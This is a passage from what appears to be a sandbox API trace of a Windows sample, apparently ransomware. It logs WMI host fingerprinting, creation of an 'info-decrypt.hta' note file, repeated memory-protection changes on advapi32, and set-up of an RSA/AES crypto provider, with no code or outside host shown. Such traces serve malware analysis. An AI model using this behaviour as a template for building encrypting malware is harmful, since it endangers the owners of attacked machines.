Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x641d9dc | out: ppv=0x641d9dc*=0x6736f28) returned 0x0 [0134.253] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6736f28, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x641da70 | out: ppNamespace=0x641da70*=0x673969c) returned 0x0 [0134.473] WbemLocator:IUnknown:QueryInterface (in: This=0x673969c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d90c | out: ppvObject=0x641d90c*=0x780dc4) returned 0x0 [0134.474] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x780dc4, pProxy=0x673969c, pAuthnSvc=0x641d95c, pAuthzSvc=0x641d958, pServerPrincName=0x641d950, pAuthnLevel=0x641d954, pImpLevel=0x641d944, pAuthInfo=0x641d948, pCapabilites=0x641d94c | out: pAuthnSvc=0x641d95c*=0xa, pAuthzSvc=0x641d958*=0x0, pServerPrincName=0x641d950, pAuthnLevel=0x641d954*=0x6, pImpLevel=0x641d944*=0x2, pAuthInfo=0x641d948, pCapabilites=0x641d94c*=0x1) returned 0x0 [0134.474] WbemLocator:IUnknown:Release (This=0x780dc4) returned 0x1 [0134.474] WbemLocator:IUnknown:QueryInterface (in: This=0x673969c, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d900 | out: ppvObject=0x641d900*=0x780de4) returned 0x0 [0134.474] WbemLocator:IUnknown:QueryInterface (in: This=0x673969c, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d8fc | out: ppvObject=0x641d8fc*=0x780dc4) returned 0x0 [0134.474] WbemLocator:IClientSecurity:SetBlanket (This=0x780dc4, pProxy=0x673969c, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0134.474] WbemLocator:IUnknown:Release (This=0x780dc4) returned 0x2 [0134.474] WbemLocator:IUnknown:Release (This=0x780de4) returned 0x1 [0134.474] CoTaskMemFree (pv=0x77e1d8) [0134.474] WbemLocator:IUnknown:Release (This=0x6736f28) returned 0x0 [0134.475] WbemLocator:IUnknown:QueryInterface (in: This=0x673969c, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d4fc | out: ppvObject=0x641d4fc*=0x780de4) returned 0x0 [0134.475] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x641d4b8 | out: ppvObject=0x641d4b8*=0x0) returned 0x80004002 [0134.475] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x641d2d4 | out: ppvObject=0x641d2d4*=0x0) returned 0x80004002 [0134.475] WbemLocator:IUnknown:AddRef (This=0x780de4) returned 0x3 [0134.475] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x641ce14 | out: ppvObject=0x641ce14*=0x0) returned 0x80004002 [0134.476] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x641cdc4 | out: ppvObject=0x641cdc4*=0x0) returned 0x80004002 [0134.476] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641cdd0 | out: ppvObject=0x641cdd0*=0x780d44) returned 0x0 [0134.476] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780d44, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x641cdd8 | out: pCid=0x641cdd8*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0134.476] WbemLocator:IUnknown:Release (This=0x780d44) returned 0x3 [0134.476] CoGetContextToken (in: pToken=0x641ce30 | out: pToken=0x641ce30) returned 0x0 [0134.476] CoGetContextToken (in: pToken=0x641d238 | out: pToken=0x641d238) returned 0x0 [0134.476] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d2c8 | out: ppvObject=0x641d2c8*=0x780dcc) returned 0x0 [0134.476] WbemLocator:IRpcOptions:Query (in: This=0x780dcc, pPrx=0x780de4, dwProperty=2, pdwValue=0x641d2f0 | out: pdwValue=0x641d2f0) returned 0x80004002 [0134.476] WbemLocator:IUnknown:Release (This=0x780dcc) returned 0x3 [0134.476] WbemLocator:IUnknown:Release (This=0x780de4) returned 0x2 [0134.476] CoGetContextToken (in: pToken=0x641d810 | out: pToken=0x641d810) returned 0x0 [0134.476] CoGetContextToken (in: pToken=0x641d770 | out: pToken=0x641d770) returned 0x0 [0134.476] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x641d840*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x641d83c | out: ppvObject=0x641d83c*=0x673969c) returned 0x0 [0134.477] WbemLocator:IUnknown:AddRef (This=0x673969c) returned 0x4 [0134.477] WbemLocator:IUnknown:Release (This=0x673969c) returned 0x3 [0134.477] WbemLocator:IUnknown:Release (This=0x673969c) returned 0x2 [0134.477] SysStringLen (param_1=0x0) returned 0x0 [0134.477] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67385b0, puCount=0x641dbd4 | out: puCount=0x641dbd4*=0x0) returned 0x0 [0134.477] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x641dbd0*=0x0, pszText=0x0 | out: puBuffLength=0x641dbd0*=0x20, pszText=0x0) returned 0x0 [0134.477] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x641dbd0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641dbd0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0134.477] CoGetContextToken (in: pToken=0x641d840 | out: pToken=0x641d840) returned 0x0 [0134.477] WbemLocator:IUnknown:AddRef (This=0x780de4) returned 0x3 [0134.477] WbemLocator:IUnknown:QueryInterface (in: This=0x780de4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x641d6d4 | out: ppvObject=0x641d6d4*=0x780de4) returned 0x0 [0134.477] WbemLocator:IUnknown:Release (This=0x780de4) returned 0x3 [0134.477] WbemLocator:IUnknown:Release (This=0x780de4) returned 0x2 [0134.477] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x641dbd8*=0x0, pszText=0x0 | out: puBuffLength=0x641dbd8*=0x20, pszText=0x0) returned 0x0 [0134.477] WbemDefPath:IWbemPath:GetText (in: This=0x67385b0, lFlags=2, puBuffLength=0x641dbd8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x641dbd8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0134.478] IWbemServices:GetObject (in: This=0x673969c, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x641db8c*=0x0, ppCallResult=0x0 | out: ppObject=0x641db8c*=0x673afa0, ppCallResult=0x0) returned 0x0 [0136.457] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6738620, puCount=0x641db8c | out: puCount=0x641db8c*=0x2) returned 0x0 [0136.457] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x641db88*=0x0, pszText=0x0 | out: puBuffLength=0x641db88*=0xf, pszText=0x0) returned 0x0 [0136.457] WbemDefPath:IWbemPath:GetText (in: This=0x6738620, lFlags=4, puBuffLength=0x641db88*=0xf, pszText="00000000000000" | out: puBuffLength=0x641db88*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0136.457] IWbemClassObject:Get (in: This=0x673afa0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x641db88*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x33d8564*=0, plFlavor=0x33d8568*=0 | out: pVal=0x641db88*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x33d8564*=8, plFlavor=0x33d8568*=0) returned 0x0 [0136.457] SysStringByteLen (bstr="9C354B42") returned 0x10 [0136.457] SysStringByteLen (bstr="9C354B42") returned 0x10 [0136.457] IWbemClassObject:Get (in: This=0x673afa0, wszName="VolumeSerialNumber", lFlags=0, pVal=0x641db90*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x33d8564*=8, plFlavor=0x33d8568*=0 | out: pVal=0x641db90*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x33d8564*=8, plFlavor=0x33d8568*=0) returned 0x0 [0136.457] SysStringByteLen (bstr="9C354B42") returned 0x10 [0136.457] SysStringByteLen (bstr="9C354B42") returned 0x10 [0136.465] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x641ee88, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0136.484] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x641ee80, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0136.484] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x641ee88, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.hta", lpFilePart=0x0) returned 0x13 [0136.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f2e8) returned 1 [0136.484] GetFileAttributesExW (in: lpFileName="C:\\info-decrypt.hta" (normalized: "c:\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x641f364 | out: lpFileInformation=0x641f364*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0136.484] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f2e4) returned 1 [0136.484] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x641ee80, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0136.484] GetFullPathNameW (in: lpFileName="C:\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x641ed28, lpFilePart=0x0 | out: lpBuffer="C:\\info-decrypt.hta", lpFilePart=0x0) returned 0x13 [0136.484] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f21c) returned 1 [0136.484] CreateFileW (lpFileName="C:\\info-decrypt.hta" (normalized: "c:\\info-decrypt.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x3a8 [0136.497] GetFileType (hFile=0x3a8) returned 0x1 [0136.498] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f218) returned 1 [0136.498] GetFileType (hFile=0x3a8) returned 0x1 [0136.498] WriteFile (in: hFile=0x3a8, lpBuffer=0x33eda40*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x641f2e0, lpOverlapped=0x0 | out: lpBuffer=0x33eda40*, lpNumberOfBytesWritten=0x641f2e0*=0x1000, lpOverlapped=0x0) returned 1 [0136.499] WriteFile (in: hFile=0x3a8, lpBuffer=0x33eda40*, nNumberOfBytesToWrite=0x557, lpNumberOfBytesWritten=0x641f2b4, lpOverlapped=0x0 | out: lpBuffer=0x33eda40*, lpNumberOfBytesWritten=0x641f2b4*=0x557, lpOverlapped=0x0) returned 1 [0136.499] CloseHandle (hObject=0x3a8) returned 1 [0136.499] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x641ee04, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0136.499] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f2b0) returned 1 [0136.499] GetFileAttributesExW (in: lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), fInfoLevelId=0x0, lpFileInformation=0x33eea5c | out: lpFileInformation=0x33eea5c*(dwFileAttributes=0x27, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x84a3bb2c, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x5db2a)) returned 1 [0136.508] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f2ac) returned 1 [0136.509] GetFullPathNameW (in: lpFileName="C:\\bootmgr", nBufferLength=0x105, lpBuffer=0x641ecf0, lpFilePart=0x0 | out: lpBuffer="C:\\bootmgr", lpFilePart=0x0) returned 0xa [0136.509] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x641f1e4) returned 1 [0136.509] CreateFileW (lpFileName="C:\\bootmgr" (normalized: "c:\\bootmgr"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a8 [0136.509] GetFileType (hFile=0x3a8) returned 0x1 [0136.511] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x641f1e0) returned 1 [0136.511] GetFileType (hFile=0x3a8) returned 0x1 [0136.511] GetFileSize (in: hFile=0x3a8, lpFileSizeHigh=0x641f2ec | out: lpFileSizeHigh=0x641f2ec*=0x0) returned 0x5db2a [0136.513] ReadFile (in: hFile=0x3a8, lpBuffer=0x438eda8, nNumberOfBytesToRead=0x5db2a, lpNumberOfBytesRead=0x641f298, lpOverlapped=0x0 | out: lpBuffer=0x438eda8*, lpNumberOfBytesRead=0x641f298*=0x5db2a, lpOverlapped=0x0) returned 1 [0136.534] CloseHandle (hObject=0x3a8) returned 1 [0139.222] SysReAllocStringLen (in: pbstr=0x641e5f0*=0x0, psz="advapi32", len=0x8 | out: pbstr=0x641e5f0*="advapi32") returned 1 [0139.222] CharLowerBuffW (in: lpsz="advapi32", cchLength=0x8 | out: lpsz="advapi32") returned 0x8 [0139.222] LoadLibraryExW (lpLibFileName="advapi32", hFile=0x0, dwFlags=0x0) returned 0x77710000 [0139.223] GetLastError () returned 0x0 [0139.223] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76d30000 [0139.224] GetModuleHandleA (lpModuleName="ntdll.dll") returned 0x77c40000 [0139.224] GetModuleFileNameA (in: hModule=0x77710000, lpFilename=0x641e4d4, nSize=0x105 | out: lpFilename="C:\\Windows\\syswow64\\ADVAPI32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll")) returned 0x20 [0139.224] GetCurrentProcess () returned 0xffffffff [0139.224] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x77711520, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x4, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x20) returned 0x0 [0139.326] GetCurrentProcess () returned 0xffffffff [0139.326] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x77711520, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x20, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x4) returned 0x0 [0139.326] GetCurrentProcess () returned 0xffffffff [0139.326] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x77711540, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x4, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x20) returned 0x0 [0139.327] GetCurrentProcess () returned 0xffffffff [0139.327] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x77711540, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x20, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x4) returned 0x0 [0139.327] GetCurrentProcess () returned 0xffffffff [0139.328] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x7771175c, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x4, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x20) returned 0x0 [0139.328] GetCurrentProcess () returned 0xffffffff [0139.328] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x7771175c, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x20, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x4) returned 0x0 [0139.328] GetCurrentProcess () returned 0xffffffff [0139.329] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x77711768, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x4, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x20) returned 0x0 [0139.329] GetCurrentProcess () returned 0xffffffff [0139.329] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x77711768, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x20, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x4) returned 0x0 [0139.330] GetCurrentProcess () returned 0xffffffff [0139.330] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x777117b8, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x4, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x20) returned 0x0 [0139.330] GetCurrentProcess () returned 0xffffffff [0139.330] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x777117b8, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x20, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x4) returned 0x0 [0139.330] GetCurrentProcess () returned 0xffffffff [0139.331] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x777117bc, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x4, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x20) returned 0x0 [0139.331] GetCurrentProcess () returned 0xffffffff [0139.331] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x777117bc, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x20, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x4) returned 0x0 [0139.331] GetCurrentProcess () returned 0xffffffff [0139.331] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x777117c8, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x4, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x20) returned 0x0 [0139.332] GetCurrentProcess () returned 0xffffffff [0139.332] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x777117c8, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x20, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x4) returned 0x0 [0139.332] GetCurrentProcess () returned 0xffffffff [0139.332] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x777117d0, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x4, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x20) returned 0x0 [0139.333] GetCurrentProcess () returned 0xffffffff [0139.333] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x777117d0, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x20, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x4) returned 0x0 [0139.333] GetCurrentProcess () returned 0xffffffff [0139.333] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x7771180c, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x4, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x20) returned 0x0 [0139.334] GetCurrentProcess () returned 0xffffffff [0139.334] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x7771180c, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x20, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x4) returned 0x0 [0139.334] GetCurrentProcess () returned 0xffffffff [0139.334] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x7771182c, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x4, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x20) returned 0x0 [0139.334] GetCurrentProcess () returned 0xffffffff [0139.335] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x7771182c, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x20, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x4) returned 0x0 [0139.335] GetCurrentProcess () returned 0xffffffff [0139.335] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x77711860, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x4, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x20) returned 0x0 [0139.335] GetCurrentProcess () returned 0xffffffff [0139.335] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x641e5d8*=0x77711860, NumberOfBytesToProtect=0x641e5dc, NewAccessProtection=0x20, OldAccessProtection=0x641e610 | out: BaseAddress=0x641e5d8*=0x77711000, NumberOfBytesToProtect=0x641e5dc, OldAccessProtection=0x641e610*=0x4) returned 0x0 [0139.336] SetLastError (dwErrCode=0x0) [0139.337] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContext") returned 0x0 [0139.337] GetProcAddress (hModule=0x77710000, lpProcName="CryptAcquireContextW") returned 0x7771df14 [0139.337] CryptAcquireContextW (in: phProv=0x641f238, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x641f238*=0x6ee740) returned 1 [0139.371] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x1 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.371] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.371] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x1 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.394] CoTaskMemFree (pv=0x7acc28) [0139.394] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.394] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.394] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.394] CoTaskMemFree (pv=0x7acc28) [0139.394] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.394] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.394] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, pdwDataLen=0x641f1fc) returned 1 [0139.394] CoTaskMemFree (pv=0x7acc28) [0139.394] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x0, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x641f1fc) returned 1 [0139.394] CoTaskMemAlloc (cb=0x20) returned 0x7acc28 [0139.394] CryptGetProvParam (in: hProv=0x6ee740, dwParam=0x1, pbData=0x7acc28, pdwDataLen=0x641f1fc, dwFlags=0x0 | out: pbData=0x7acc28, 